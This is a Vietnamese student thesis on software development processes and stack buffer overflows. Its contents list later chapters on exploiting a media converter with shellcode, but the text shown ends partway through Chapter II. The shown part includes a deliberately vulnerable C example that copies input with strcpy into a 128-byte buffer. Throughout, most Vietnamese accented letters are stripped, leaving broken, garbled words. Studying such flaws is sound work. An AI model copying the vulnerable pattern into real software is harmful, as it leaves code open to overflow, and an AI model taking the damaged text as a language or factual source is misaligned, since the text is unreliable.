tràn bộ đệm

MC LC
DANH MC CC T VIT TT.. 3

DANH MC CC BNG.. 4
DANH MC CC HNH V.. 5
LI NI U.. 7
CHNG I. TNG QUAN QUI TRNH PHT TRIN PHN MM 9
1.1.
GII THIU CHUNG.. 9
1.1.1.
Khi nim phn mm.. 9
1.1.2.
Qui trnh pht trin phn mm.. 9
1.2.
CC THNH PHN CA PHN MM 10
1.2.1.
Cc ti liu ca qu trnh pht trin PM 10
1.2.2.
Cc thnh phn to nn mt sn phm phn mm.. 10
1.3.
M HNH PHT TRIN PHN MM 11
1.3.1.
M hnh Waterfall 11
1.3.2.
M hnh ch V.. 13
1.3.3.
M hnh mu. 15
1.3.4.
M hnh tin ha. 16
1.3.5.
M hnh lp v tng dn. 17
1.3.6.
M hnh pht trin nhanh. 19
1.3.7.
M hnh xon. 20
Kt lun chng I. 22
CHNG II. LI BO MT PHN MM, MT S LI BO MT PHN MM PH BIN
2.1.
GII THIU CHUNG.. 23
2.1.1.
nh ngha li phn mm.. 23
2.1.2.
nh ngha li bo mt phn mm.. 23
2.2.
2.2.1.
LI TRN B M TRN STACK.. 23

Tm hiu v Stack. 23
23
2.2.2.
Li trn Stack (Stack Based BufferOverflow). 26
2.3.
LI TRN B M TRN HEAP. 34
2.4.
LI DOUBLE FREE.. 34
Kt lun chng II. 36

CHNG III. CC K THUT TM LI V CC BC KHAI THC LI BO MT PHN MM 37
3.1.
TM V PHT HIN LI 37
3.1.1.
Vai tr l lp trnh vin. 37
3.1.2.
Vai tr l ngi kim th. 39
3.1.3.
Vai tr l hacker. 40
3.2.
CC BC KHAI THC LI 42
3.2.1.
Mc chng trnh ti debugger. 42
3.2.2.
xc nh chnh xc EIP trong b m.. 44
3.2.3.
Tm khng gian b nh lu tr cc shellcode. 47
3.2.4.
Nhy n shellcode mt cch tin cy. 52
3.2.5.
Ly shellcode hon thin exploit 56
3.3.
CC K THUT NHY TI SHELLCODE.. 57
3.3.1.
jump (hoc call). 57
3.3.2.
pop return. 59
3.3.3.
Push return. 64
3.3.4.
jmp [reg + offset]. 66
3.3.5.
blind return. 67
3.3.6.
Dealing with small buffers. 68
3.3.7.
SEH (Structured Exception Handling). 74
3.3.8.
Mt s k thut khc. 74
3.4.
SHELLCODE BACKDOOR.. 78
Kt lun chng III. 81

XUT QU TRNH PHT TRIN PHN MM AN TON.. 82
KT LUN V NH HNG PHT TRIN.. 83
TI LIU THAM KHO.. 84

PH LC.. 85
1.
PH LC 1: CHNG TRNH KHI NP TRONG B NH.. 85
2.
PH LC 2: THE PROCESS MEMORY.. 86
3.
PH LC 3. 89
4.
PH LC 4: BNG OPCODE CA CC LNH NHY V C.. 90
5.
PH LC 5 : CC BC THC HIN DEMO.. 92
DANH MC CC T VIT TT
K hiu Thut ng
ngha
SEP
Software Development/Engineering Process
Qui trnh pht trin/xy dng phn mm
ID
Identifier
nh danh
CSDL
C s d liu
C s d liu
SRS
Software requirement specification
Bn c t yu cu phn mm
GUI
Graphical user interface
Giao din ha ngi dng
RUP
Rational Unified Process
Qui trnh thng nht hp l
RAD
Rapid Application Development
M hnh pht trin nhanh
OS
Operating system
H iu hnh
LIFO
Last In First Out
vo sau ra trc
ESP
Extended Stack Pointer
Con tr stack m rng
EBP
Extended Base Pointer
Con tr c s m rng
EIP
Extended Instruction Pointer
Con tr lnh m rng
NOP
No Operation Performed
Khng thc hin hnh ng no
DLL
Dynamic Link Library
Th vin lin kt ng
CPU
Central Processing Unit
B x l trung tm
SEH
Structured Exception Handling
X l cu trc ngoi l
DANH MC CC BNG
Bng 1.
Bng 2.
Bng 3.
Bng 4.
Bng lit k cc hm gy li
Bng cc cu trc gy li
Bng cc testcase
Bng opcode ca cc lnh nhy v c
DANH MC CC HNH V
Hnh 1.1
M hnh Waterfall
Hnh 1.2
M hnh ch V
Hnh 1.3
M hnh Prototype
Hnh 1.4
M hnh tin ha
Hnh 1.5
M hnh lp v tng dn
Hnh 1.6
2 M hnh pht trin
Hnh 1.7
M hnh xon
Hnh 2.1
Stack
Hnh 2.2
Push
Hnh 2.3
Pop
Hnh 2.4
Peek
Hnh 2.5
Stack frame c to
Hnh 2.6
Stack sau khi thc hin lnh MOV
Hnh 2.7
Stack sau khi thc hin hm CALL
Hnh 2.8
ESP s gim 4bytes
Hnh 2.9
ESP tr n 0022FF5C
Hnh 2.10
ESP li gim 4bytes ln na
Hnh 2.11
ESP s gim mt s bytes c khng gian cho bin
Hnh 2.12
Hnh 2.13
ESP tr v u chui
Hnh 2.14
Strcpy() s ghi EBP c lu v c EIP
Hnh 3.1
strcpy, strncpy, v strlcpy
Hnh 3.2
ng dng khng b crash
Hnh 3.3
ng dng b crash
Hnh 3.4
Giao din ca Windbg
Hnh 3.5
Giao din ca Immunity
Hnh 3.6
EIP cha 42424242 (BBBB)
Hnh 3.7
Ni dung ca Buffer sau khi thc Easy RM to MP3 chy
Hnh 3.8
ni dung ESP
Hnh 3.9
Ni dung ca EIP sau khi ng dng sp
Hnh 3.10
EIP mang gi tr BBBB
Hnh 3.11
ESP lu a ch 000ff730
Hnh 3.12
Ni dung ca Expliot buffer
Hnh 3.13
ESP bt u t k t th 5
Hnh 3.14
ESP tr vo k t u tin ca chui mu
Hnh 3.15
eip cha ni dung l 000ff730
Hnh 3.16
Mc windbg vi Easy RM to MP3
Hnh 3.17
ffe4 l opcode ca jmp esp
Hnh 3.18
Opcode ca jmp esp trong file dll
Hnh 3.19
Kt qu thu c khi th nghim vi on NOP break
Hnh 3.20
Khai thc thnh cng
Hnh 3.21
Mt vi opcode
Hnh 3.22
EIP b ghi a ch ti jmp esp
Hnh 3.23
Opcode c trnh t 054,0xc3
Hnh 3.24
phn b nh ln vi A
Hnh 3.25
000ff849 l mt phn mu
Hnh 3.26
shellcode di 344byte ng dng b crash
Hnh ph lc
S b nh trong tin trnh ca Win32
LI NI U
Ngy nay, s pht trin ca cng ngh thng tin ngy cng chim mt v tr quan trng trong mi lnh
vc ca cuc sng. S bng n ca khoa hc cng ngh ni chung v cng ngh thng tin ni ring
em li rt nhiu li ch cho con ngi, rt ngn khong cch v a l, tng hiu sut, tit kim thi
gian v chi ph cho cng vic
Khi m cng ngh thng tin pht trin mnh m nh ngy nay, th my tnh l mt vt dng thit yu
i vi mi ngi. T mi lnh vc trong cuc sng cho ti mi ngnh ngh u lin quan ti my tnh.
Mi ngi lm vic vi my tnh chnh l lm vic vi phn mm. Phn mm tr thnh mt phn tt
yu trong cng vic ca mi ngi khi lm vic vi my tnh. Vi s pht trin mnh m ca cng
ngh phn mm to ra v vn cc sn phm, cng c phn mm phc v cho mi nhu cu ca con
ngi. Phn mm em li nhng li ch v cng to ln cho con ngi, n gii quyt nhiu bi
ton m trc kia con ngi khng th thc hin c. Song bn cnh nhng li ch to ln phn
mm cng mang li khng t nhng nguy c ri ro. Cc ri ro ny ti t vic xut hin l hng bo
mt trn nhng phn mm c s dng.
Vy nhng l hng bo mt ny l g? Ti sao chng li xut hin? Cch th khai thc chng ra sao?
y l nhng cu hi m nhiu ngi ang tm hiu. Vic tm hiu v l hng bo mt phn mm l
mt vn v cng quan trng v chim khng t cng sc ca cc nh pht trin phn mm trn th
gii.
ti n tt nghip Nghin cu cc k thut tm v khai thc l hng bo mt phn mm
c b cc gm 3 chng:
Chng I. Tng quan qui trnh pht trin phn mm
Nu l thuyt chung v phn mm
Cc qui trnh pht trin phn mm
Chng II. Cc li bo mt phn mm ph bin
Nu khi nim v li phn mm, li bo mt phn mm
Tm hiu mt s li bo mt phn mm ph bin

Phn tch li trn b m trn stack
Chng III. Cc k thut tm, pht hin v khai thc li bo mt phn mm
Nu ra cc k thut tm li bo mt phn mm
Nu ra cc k thut khai thc li bo mt phn mm
Do ni dung bao gm nhiu kin thc mi, thi gian v kin thc cn hn ch, vic nghin cu ch
yu da trn l thuyt nn chc chn ti khng trnh khi nhng thiu st. Em rt mong nhn
c s ng gp kin ca thy c gio v bn b ti ca em ngy mt hon thin hn.
Trong qu trnh thc hin ti, hon thin bi thc tp ny em xin chn thnh cm n Ban lnh
o Hc Vin K Thut Mt M quan tm v to iu kin cho em c mi trng hc tp, rn
luyn v nghin cu. Em xin chn thnh cm n cc Thy C gio trong khoa Cng Ngh Thng Tin,
Khoa An Ton Thng Tin, Khoa C Bn, Khoa L Lun Chnh Tr cung cp cho em nhng kin thc
ht sc qu bu trong Nm nm hc ti trng. c bit em xin c chn thnh cm n s nhit tnh
gip ca thy L M T v thy V nh Thu nhit tnh hng dn gip em hon thnh ti
ny.
Em xin chn thnh cm n !
CHNG I. TNG QUAN QUI TRNH

PHT TRIN PHN MM
1.1.
GII THIU CHUNG
1.1.1. Khi nim phn mm

Phn mm l mt tp hp nhng cu lnh hoc ch th c vit bng ngn ng lp trnh theo mt trt
t xc nh, v cc d liu hay ti liu lin quan nhm t ng thc hin mt s nhim v hay chc
nng hoc gii quyt mt vn c th no .
Phn mm thc hin cc chc nng ca n bng cch gi cc ch th trc tip n phn cng hoc
bng cch cung cp d liu phc v cc chng trnh hay phn mm khc.
Phn mm l mt khi nim tru tng, n khng th s hay ng vo, n cn c phn cng thc
thi.
1.1.2. Qui trnh pht trin phn mm
Qui trnh c th hiu l phng php thc hin hoc sn xut ra sn phm. Tng t nh vy, Qui
trnh pht trin phn mm chnh l phng php pht trin hay sn xut ra sn phm phn mm.
Thng thng mt qui trnh bao gm nhng yu t c bn sau:
Th tc (Procedures)
Hng dn cng vic (Activity Guidelines)
Biu mu (Forms/templates)
Danh sch kim nh (Checklists)
Cng c h tr (Tools)
Vi cc nhm cng vic chnh:
c t yu cu (Requirements Specification): ch ra nhng i hi cho c cc yu cu

chc nng v phi chc nng.
Pht trin phn mm (Development): to ra phn mm tha mn cc yu cu c ch ra

trong c t yu cu.
Kim th phn mm (Validation/Testing): bo m phn mm sn xut ra p ng

nhng i hi c ch ra trong c t yu cu.
Thay i phn mm (Evolution): p ng nhu cu thay i ca khch hng.

Ty theo m hnh pht trin phn mm, cc nhm cng vic c trin khai theo nhng cch khc
nhau. sn xut cng mt sn phm phn mm ngi ta c th dng cc m hnh khc nhau. Tuy
nhin khng phi tt c cc m hnh u thch hp cho mi ng dng.
1.2.
CC THNH PHN CA PHN MM
1.2.1. Cc ti liu ca qu trnh pht trin PM
Yu cu ca khch hng: Ti liu ny l kt qu ca qu trnh thu thp yu cu. Bao gm cc
pht biu bng ngn ng t nhin (v cc s ).
c t sn phm: Ti liu m t chi tit v phn mm, nhm phc v cho thit k phn mm.
K hoch lm vic: Ti liu m t chi tit cc cng vic cn lm trong qu trnh pht trin phn
mm
Ti liu thit k phn mm: Bao gm cc ti liu v cu trc phn mm, Biu lung d liu,
Biu trng thi qu trnh trao i, ch thch lnh.
Ti liu kim th: Ti liu chi tit cho qu trnh kim th. Bao gm cc ti liu sau:
K hoch kim th (Test plan)
Dan sch cc trng hp kim th (Test case list)
Bn bo co li pht hin (Bug report)
Danh sch cc cng c cho vic kim th (Test tool)

1.2.2. Cc thnh phn to nn mt sn phm phn mm
Tp tr gip (Help files)
Hng dn ngi dng (Users manual)
Cc mu v v d (Samples and examples)
Nhn v dn nhn (Labels and stickers)
Thng tin h tr sn phm (Product support info)
Biu tng v hnh ha (Icons and art)
Thng bo li (Error messages)
Qung co v ti liu tip th (Ads and marketing material)
Thit lp v ci t (Setup and installation)
Tp Readme[1] (Readme file)
1.3.
M HNH PHT TRIN PHN MM
1.3.1. M hnh Waterfall
Hnh 1.1: M hnh Waterfall

M hnh ny bao gm cc giai on x l ni tip nhau nh c m t trong hnh
Phn tch yu cu v ti liu c t (Requirements and Specifications): l giai on xc nh nhng
i hi lin quan n chc nng v phi chc nng m h thng phn mm cn c. Giai on ny cn
s tham gia tch cc ca khch hng v kt thc bng mt ti liu c gi l Bn c t yu cu
phn mm hay SRS (software requirement specification), trong bao gm tp hp cc yu cu
c duyt (reviewed) v nghim thu (approved) bi nhng ngi c trch nhim i vi d n (t
pha khch hng). SRS chnh l nn tng cho cc hot ng tip theo cho n cui d n.
Phn tch h thng v thit k (System Analysis and Design): l giai on nh ra lm th no
(How) h thng phn mm p ng nhng i hi (What) m khch hng yu cu trong SRS.
y l chnh l cu ni gia i hi (What) v m (Code) c hin thc p ng yu cu .
Hin thc v kim th tng thnh phn (Coding and Unit Test): l giai on hin thc lm th no
(How) c ch ra trong giai on Phn tch h thng v thit k.
Kim th (Test): giai on ny s tin hnh kim th m (code) c hin thc, bao gm kim th
tch hp cho nhm cc thnh phn v kim th ton h thng (system test). Mt khu kim th cui
cng thng c thc hin l nghim thu (acceptance test), vi s tham gia ca khch hng trong
vai tr chnh xc nh h thng phn mm c p ng yu cu ca h hay khng.
Ci t v bo tr (Deployment and Maintenance): y l giai on ci t, cu hnh v hun luyn

khch hng. Giai on ny sa cha nhng li ca phn mm (nu c) v pht trin nhng thay i
mi c khch hng yu cu (nh sa i, thm hay bt chc nng/c im ca h thng).
Thc t cho thy n nhng giai on sau mi c kh nng nhn ra sai st trong nhng giai on
trc v phi quay li sa cha. y chnh l kiu waterfall dng lp (Iterative Waterfall)
u im: Cc giai on c nh ngha, vi u vo v u ra r rng. M hnh ny c bn da trn
ti liu nht l trong cc giai on u, u vo v u ra u l ti liu.Sn phm phn mm c
hnh thnh thng qua chui cc hot ng xy dng phn mm theo trnh t r rng.
Nhc im: i hi tt c yu cu phn mm phi c xc nh r rng ngay t u d n. Nhng
a s d n thc t cho thy yu cu phn mm thng n cha khng nhiu th t nhng im khng
chc chn.
Mt thc t l cc d n him khi c thc hin y cc bc trong sut chu k d n. c bit l
giai on kim th khi gn n ngy giao hng chng hn, nu c trc trc xy ra do yu cu phn
mm khng r rng hay thit k c li, xu hng l m ngun c sa i trc tip m khng qua
cc bc b sung theo ng m hnh, nn dn n bn c t phn mm cng nh mt s sn phm
trung gian khc nh bn thit k, cho d c c cp nht sau ny cng c th khng phn nh y
nhng g c sa i trong m ngun.
Ngi s dng khng c c hi tham gia trong sut thi gian ca cc giai on trung gian t thit k
cho n kim th. c bit vi nhng d n ln, ngi s dng ch c th nhn ra rng h thng phn
mm khng ph hp cho nhu cu ca h vo thi im cui d n.
Ni chung, m hnh ny thng n cha nhiu ri ro m ch c th pht hin giai on cui cng
(c minh ha trong hnh) v chi ph sa cha c th rt cao.
ng dng: Yu cu c nh ngha rt r rng, chi tit v hu nh khng thay i, thng xut pht
t sn phm t mc n nh.
Yu cu mi b sung (nu c) cng sm c xc nh r rng, y t u d n.
i ng thc hin quen thuc v hiu r tt c yu cu ca d n, v c nhiu kinh nghim vi cc
cng ngh c dng pht trin sn phm.
D n c xc nh hu nh khng c ri ro.
1.3.2. M hnh ch V
Trong m hnh Waterfall, kim th c thc hin trong mt giai on ring bit. Cn vi m hnh ch
V, ton b qui trnh c chia thnh hai nhm giai on tng ng nhau: pht trin v kim th. Mi
giai on pht trin s kt hp vi mt giai on kim th tng ng nh c minh ha trong hnh.
Hnh 1.2: M hnh ch V

Tinh thn ch o ca m hnh ch V l cc hot ng kim th phi c tin hnh song song (theo
kh nng c th) ngay t u chu trnh cng vi cc hot ng pht trin. V d, cc hot ng cho
vic lp k hoch kim th ton h thng c th c thc hin song song vi cc hot ng phn tch
v thit k h thng.
u im: Cc hot ng kim th c ch trng v thc hin song song vi cc hot ng lin quan
n c t yu cu v thit k. Hay ni cch khc, m hnh ny khuyn khch cc hot ng lin quan
n k hoch kim th c tin hnh sm trong chu k pht trin, khng phi i n lc kt thc
giai on hin thc.
Nhc im: Ging m hnh waterfall
ng dng: Tham kho m hnh waterfall.
1.3.3. M hnh mu
Hnh 1.3: M hnh Prototype

M hnh mu (prototype) c minh ho trong hnh. Trong , qui trnh c bt u bng vic thu
thp yu cu vi s c mt ca i din ca c pha pht trin ln khch hng nhm nh ra mc tiu
tng th ca h thng phn mm sau ny, ng thi ghi nhn tt c nhng yu cu c th bit c
v s luc nhng nhm yu cu no cn phi c lm r.Sau , thc hin thit k nhanh tp trung
chuyn ti nhng kha cnh thng qua prototype khch hng c th hnh dung, nh gi gip hon
chnh yu cu cho ton h thng phn mm. Vic ny khng nhng gip tinh chnh yu cu, m ng
thi gip cho i ng pht trin thng hiu hn nhng g cn c pht trin. Tip theo sau giai on
lm prototype ny c th l mt chu trnh theo m hnh waterfall hay cng c th l m hnh khc.Ch
, prototype thng c lm tht nhanh trong thi gian ngn nn khng c xy dng trn cng
mi trng v cng c pht trin ca giai on xy dng phn mm thc s sau ny. Prototype khng
t ra mc tiu ti s dng cho giai on pht trin thc s sau .
u im: Ngi s dng sm hnh dung ra chc nng v c im ca h thng. Ci thin s lin lc
gia nh pht trin v ngi s dng.
Nhc im: Khi mu (prototype) khng chuyn ti ht cc chc nng, c im ca h thng phn
mm th ngi s dng c th tht vng v mt i s quan tm n h thng s c pht trin.
Prototype thng c lm nhanh, thm ch vi vng, theo kiu hin thc sa v c th thiu s
phn tch nh gi mt cch cn thn tt c kha cnh lin quan n h thng cui cng. Ni chung
m hnh ny vn cha th ci thin c vic loi tr khong cch gia yu cu v ng dng cui
cng.
ng dng: H thng ch yu da trn giao din ngi dng (GUI). Khch hng, nht l ngi s
dng cui, khng th xc nh r rng yu cu.
1.3.4. M hnh tin ha
Hnh 1.4: M hnh tin ha

M hnh ny thc s cng l mt dng da trn m hnh mu, tuy nhin c s khc bit:
M hnh tin ha xy dng nhiu phin bn prototype lin tip nhau.
Nhng phin bn prototype trc s c xy dng vi mc tiu c th ti s dng trong
nhng phin bn sau.

Hnh trn minh ha m hnh tin ha, cho thy mt s phn ca h thng phn mm c th uc xy
dng sm ngay t giai on thc hin phn tch yu cu v thit k.
u im: Ch trng vic ti s dng mu. Mt phn ca h thng c th c pht trin ngay trong
cc giai on phn tch pht trin yu cu v thit k.
Cho php thay i yu cu v khuyn khch ngi s dng tham gia trong sut chu k ca d n.
Nhc im: Lm chm qu trnh pht trin yu cu v c th nh hng s ch n cc cng vic
trung gian nh kim tra m ngun, thc hin kim th cp thp
D dn n kt cu ca h thng km.
Thng th vi m hnh ny, tnh cht ch, minh bch ca qui trnh km.
ng dng: H thng tng tc nh v va; phn GUI ca nhng h thng ln; nhng h thng cn
chu k pht trin ngn.
i ng pht trin khng quen thuc vi lnh vc ca d n.
1.3.5. M hnh lp v tng dn
Hnh 1.5: M hnh lp v tng dn

M hnh lp v tng dn c lc c hiu l mt. Tuy nhin, ta c th phn bit t nhiu s khc bit.
Trc tin, hai m hnh ny u c im ging nhau l u da trn tinh thn ca m hnh tin ha,
v c thm c im nhm n vic cung cp mt phn h thng khch hng c th a vo s
dng trong mi trng hot ng sn xut thc s m khng cn ch cho n khi ton b h thng
c hon thnh (trong m hnh mu hay tin ha, cc phin bn mu hay trung gian u khng
nhm n a vo vn hnh thc s cho khch hng, tr phin bn cui cng). khch hng c th
s dng, mi phin bn u phi c thc hin nh mt qui trnh y cc cng vic t phn tch
yu cu vi kh nng b sung hay thay i, thit k, hin thc cho n kim nghim v c th xem
nh mt qui trnh (chu trnh) con. Cc chu trnh con c th s dng cc m hnh khc nhau (thng
thng l waterfall). Hnh trn minh ha hai m hnh ny, trong mi chu trnh con l mt waterfall
nh.
Mc tiu ca phin bn u tin l pht trin phn li v nhm cc chc nng quan trng. Sau mi
phin bn c a vo s dng, cc kt qu nh gi s c phn hi v lp k hoch cho chu trnh
con ca phin bn tip theo thc hin:
Nhng thay i cho phin bn trc nhm p ng nhu cu khch hng tt hn
C th thm nhng chc nng hoc c im b sung
S khc nhau gia hai m hnh tng dn v lp c th c hiu n gin nh sau (so vi sn
phm c hon thnh trong chu trnh con trc):
M hnh tng dn (Incremental): thm chc nng vo sn phm (xem minh ho Hnh 6).
M hnh lp (Iterative): thay i sn phm (xem minh ha Hnh 6)
Mt SEP c th kt hp c hai m hnh lp ln tng dn, chng hn RUP (Rational Unified
Process).
Hnh 1.6: 2 M hnh pht trin

u im: Gim ri ro sm trong chu k pht trin phn mm. Nhng yu cu quan trng thng
c pht trin v chuyn n ngi s dng sm.
Phn hi ca ngui s dng v nhng vn pht sinh trong phin bn trc c dng ci tin v
ngn nga nhng vn tng t xy ra trong nhng phin bn tip theo.
Nhc im: Tng chi ph lp k hoch pht trin cho ton h thng c th cao hn. Lu , y ch
cp chi ph lp k hoch ban u, khng bao gm tt c chi ph pht sinh. Trong thc t, nu ng
dng hp l, ton b chi ph v thi gian cho n khi sn phm c nghim thu c th thp hn so
vi m hnh khc.
Cc yu cu v k hoch v hot ng trong qui trnh c th s phc tp hn.
ng dng:
M hnh lp:i ng pht trin quen thuc vi lnh vc d n nhng khng c nhiu kinh nghim, nht
l v cng ngh c dng pht trin d n.
C nhiu ri ro v mt k thut
M hnh tng dn:Ri ro c phn tch v xc nh ngay t u.
Giao tip gia cc module cng c xc nh r rng t u.
i ng pht trin quen thuc vi lnh vc ca d n v c nhiu kinh nghim.
H thng ln c pht trin trong thi gian di, khch hng cn trin khai sm mt s phn ca h
thng.
1.3.6. M hnh pht trin nhanh
M hnh pht trin nhanh (RAD Rapid Application Development) chnh l m hnh tng dn vi chu
k pht trin cc ngn. t c mc tiu ny, RAD da trn phng php pht trin trn c s
thnh phn ha h thng cng vi vic ti s dng cc thnh phn thch hp. RAD thch hp cho
nhng h thng qun l thng tin.
u im: Cho php gim thi gian pht trin cc ng dng CSDL v c nhiu giao din ngi dng
hay tch hp cc thnh phn c sn. Ngi s dng s tham gia vo cc hot ng kim th.
Nhc im: Kh c s nht qun gia nhng thnh phn c pht trin bi cc nhm khc nhau.
Khng ph hp cho nhng ng dng i hi hiu sut v thng ph thuc vo s h tr ca mi
trng pht trin v ngn ng cp cao.
ng dng: H thng qun l thng tin kiu nhng ng dng da trn GUI v CSDL. C s h tr ca
cng c hay s dng ngn ng cp cao. H thng khng yu cu kht khe v hiu sut.
1.3.7. M hnh xon
M hnh ny c xy dng bi Barry Boehm, t trng tm phn tch ri ro v xem xt k hoch
gii quyt chng, thng qua nhiu chu k con ni tip c lp lin tip da trn bn cht ca m
hnh lp.Trong m hnh ny, vic phn tch v gii quyt nhng vn c ri ro cao tp trung vo
thit k tng kha cnh c th ch khng da vo vic x l cc vn mt cch chung chung.
Hnh 1.7: M hnh xon

Hnh 7 minh ha m hnh ny vi cc giai on lp theo chu k xoay vng, trong mi chu k bao
gm 4 giai on con nh sau:
Xc nh mc tiu cht lng cho sn phm c thc hin, ng thi xc nh s la chn
mua, ti s dng hay t thit k v hin thc cc thnh phn ca h thng.
Phn tch s la chn v cc ri ro c th xy ra. Vic ny c thc hin bi nhiu hot ng
khc nhau thng qua lm mu hay m phng.
Pht trin v kim nh sn phm mc tip theo da trn kt qu nh hng c ch ra
trong giai on con s 2 (phn tch ri ro)
Kim duyt tt c cc kt qu ca cc giai on con xy ra trc v lp k hoch cho chu
k lp tip theo.
u im: Phn tch nh gi ri ro c y ln nh mt phn thit yu trong mi ng xon c
tng mc tin cy ca d n.
Kt hp nhng tnh cht tt nht ca m hnh waterfall v tin ha.
Cho php thay i ty theo iu kin thc t d n ti mi ng xon c.
y chnh l m hnh tng qut nht, tt c cc m hnh khc u c th xem l mt hin thc ca
m hnh tng qut ny, hay cng c th xem n l m hnh tng hp cc m hnh khc. c bit, n
c ng dng khng ch trong pht trin phn mm m cn trong pht trin phn cng.
Nhc im: Phc tp v khng ph hp cho d n nh vi t ri ro. Cn c k nng tt v phn tch
ri ro.
ng dng: D n ln c nhiu ri ro hay s thnh cng ca d n khng c c s m bo nht
nh; nhng d n i hi nhiu tnh ton, x l nh h thng h tr quyt nh. i ng thc hin d
n c kh nng phn tch ri ro.
Kt lun chng I
Chng I trnh khi nim phn mm, qui trnh pht trin phn mm; cc yu c bn ca
mt qui trnh pht trin phn mm; cc ti liu ca qu trnh pht trin phn mm, cc thnh phn
to nn mt sn phm phn mm; Tm hiu v cc m hnh pht trin phn mm cng nh u im,
nhc im, v ng dng ca chng trong vic pht trin phn mm.
Qua chng ny chng ta c ci nhn tng quan ban u v phn mm v vic pht trin mt sn
phm phn mm. Sang chng tip theo chng ta s tm hiu v li bo mt phn mm v mt s li
bo mt phn mm ph bin.
CHNG II. LI BO MT PHN

MM, MT S LI BO MT PHN
MM PH BIN
2.1.
GII THIU CHUNG
2.1.1. nh ngha li phn mm

Li phn mm l mt khi nim dng ch li khi chy, l hng b khai thc, sai st trong kt qu,
khng lm vic chnh xc ca phn mm
Hu ht cc li pht sinh t nhng sai lm hoc sai st ca lp trnh vin trong qu trnh vit m
ngun hoc trong qu trnh thit k. Cn li l do trnh bin dch lm vic khng chnh xc
Cc li nghim trng c th dn ti vic chng trnh v sp hoc ng bng
2.1.2. nh ngha li bo mt phn mm
Li bo mt phn mm l li phn mm cho php k khai thc c th vt qua cc c ch bo mt
ca h thng nh: vt qua c ch iu khin truy cp c c quyn tri php.
Mt s tn cng da trn li phn mm ph bin hin nay m chng ta thng thy l: Truy cp
tri php t xa, leo thang c quyn, t chi dch v
Mt s li bo mt phn mm ph bin l: Li trn b m trn stack, li trn b m trn heap,
double free
2.2.
LI TRN B M TRN STACK
2.2.1. Tm hiu v Stack

Trong khoa hc my tnh, mt ngn xp (cn gi l b xp chng, ting Anh: stack) l mt cu trc d
liu tru tng hot ng theo nguyn l vo sau ra trc (Last In First Out LIFO. Phn t no
c thm vo sau cng s l phn t c ly ra u tin.
Stack l mt phn ca tin trnh b nh. Khi chng trnh c np vo b nh th phn on stack
nm ngay sau phn on heap[2]. Stack c cp pht bi OS (H iu hnh) cho mi thread[3] khi
thread c to. Khi thread kt thc, stack s c xa b. Kch thc ca stack c nh ngha khi
c to v khng th thay i. Kt hp vi LIFO khng i hi c ch qun l phc tp nn stack kh
nhanh. Tuy nhin, n b gii hn trong kch c.
Mi phn t trong Stack phi cng kiu d liu v c th l bt k kiu d liu no. Mt Stack gm c
phn y (bottom) v phn nh (top). Phn t nm nh Stack c gi l Top Item. Mi thao tc
thm, xa phn t u din ra nh Stack.
Hnh 2.1: Stack

Stack n gin ch l mt danh sch. Do , n c hu ht cc thao tc nh trn danh sch nh thm,
xa, tuy nhin cch ci t s khc i mt cht. Cc thao tc c bn nht ca Stack l:
Push : chn mt phn t vo Stack
Hnh 2.2: Push

Pop : ly mt phn t ra khi Stack
Hnh 2.3: Pop

Peek : ly gi tr ca phn t nh Stack
Hnh 2.4: Peek

IsEmpty : kim tra Stack c rng hay khng
Clear : xa ht phn t trong Stack
Khi stack c to, con tr stack tr v nh ca stack ( bng a ch cao nht ca stack). Ngay khi d
liu c push vo stack, con tr stack gim ( ti a ch thp hn). V vy, stack pht trin xung
vng a ch thp hn.
Stack lu bin cc b, li gi hm v nhng thng tin khc m khng cn lu tr trong thi gian ln.
Mi ln gi hm, cc tham s ca hm c push vo stack, v cc gi tr c lu vo cc thanh ghi
(EIP, EBP)[4]. Khi hm kt thc , gi tr lu ca EIP c ly ra t stack v t tr li EIP, t
ng dng c th tr li bnh thng.
2.2.2. Li trn Stack (Stack Based BufferOverflow)
Li trn stack xut hin khi b m lu tr d liu trong b nh khng kim sot vic ghi gi tr trn
n, dn n trn stack v vic trn stack ny dn n vic ghi a ch tr v ca hm.
hiu r v trn stack nh th no. Cho mt v d sau c li trn stack (buffer overflow):
#include <string.h>
void do_something(char *Buffer)
{
char MyVar[128];
strcpy(MyVar,Buffer);
}
int main (int argc, char **argv)
{
do_something(argv[1]);
}
ng dng ly 1 agrument (tham s) ( argv[1] v truyn n vo hm do_something) Trong hm ny,
agrument s c copy ti bin cc b c di ti a 128bytes. Vy nu agrument di hn 127bytes
( 1 Null byte ngt xu) b m c th b trn.
Khi hm do_something() c gi t trong hm main(), c nhng iu sau xy ra:
Mt stack frame c to ra, nh ca stack cha parent stack. Con tr stack stack pointer
(ESP) tr vo a ch cao nht ca stack mi c to. y l nh ca stack.
Hnh 2.5: Stack frame c to

Trc khi do_something() c gi, con tr tr n agrument (i s) va c push (y) vo stack
(ngn xp). Trong trng hp ny l tr ti argv[1]
Hnh 2.6: Stack sau khi thc hin lnh MOV

Tip theo, hm do_something c gi. Hm CALL u tin t con tr lnh hin thi vo stack ( y
c bit l ni m tr li khi hm ht thc) v nhy ti function code ( on code ca hm)
Stack sau khi thc hin hm CALL:
Hnh 2.7: Stack sau khi thc hin hm CALL

Sau khi push, ESP s gim 4bytes v tr v a ch thp hn:
Hnh 2.8: ESP s gim 4bytes

ESP tr n 0022FF5C, a ch ny, chng ta thy a ch lu ca EIP (Return to) , tip theo l
tr n tham s ( AAAA trong v d ny). Con tr c lu trn stack trc khi hm CALL c
thc thi.
Hnh 2.9: ESP tr n 0022FF5C
Tip theo, hm prolog thc thi. V c bn, thanh ghi c s frame pointer (EBP) c t vo stack.
V vy n c th c phc hi khi hm tr v. Lnh lu frame pointer l push ebp . ESP li gim
4bytes ln na.
Hnh 2.10: ESP li gim 4bytes ln na

Sau khi push ebp, con tr stack hin ti (ESP) t vo EBP. Ti im ny, c ESP v EBP u tr vo
nh ca stack. T thi im , stack c tham chiu bi ESP ( lun nh ca stack by k lc
no) v EBP, con tr c s ca stack hin ti. Bng cch ny, ng dng c th tham chiu n cc bin
bng cc s dng offset vi EBP.
Hu ht cc hm u bt u vi: PUSH EBP. Theo sau l: MOV EBP,ESP
V vy, nu bn push 4bytes na vo stack. ESP s gim mt ln na cn EBP vn li . Bn c
th tham chiu 4bytes ny bng cch s dng EBP 0x8.
Tip theo, chng ta s xem lm th no stack phn b khong trng cho bin MyVar (128bytes).
gi cc d liu, mt s khng gian trn stack c phn b lu gi bin, ESP s gim mt s
bytes. Con s ny c th l hn 128bytes, ty thuc vo trnh bin dch. Trong trng hp ca
Devcpp[5], s l 098 bytes, cho nn bn s nhn thy lnh SUB ESP,098. Bng cch , s c
khng gian cho bin:
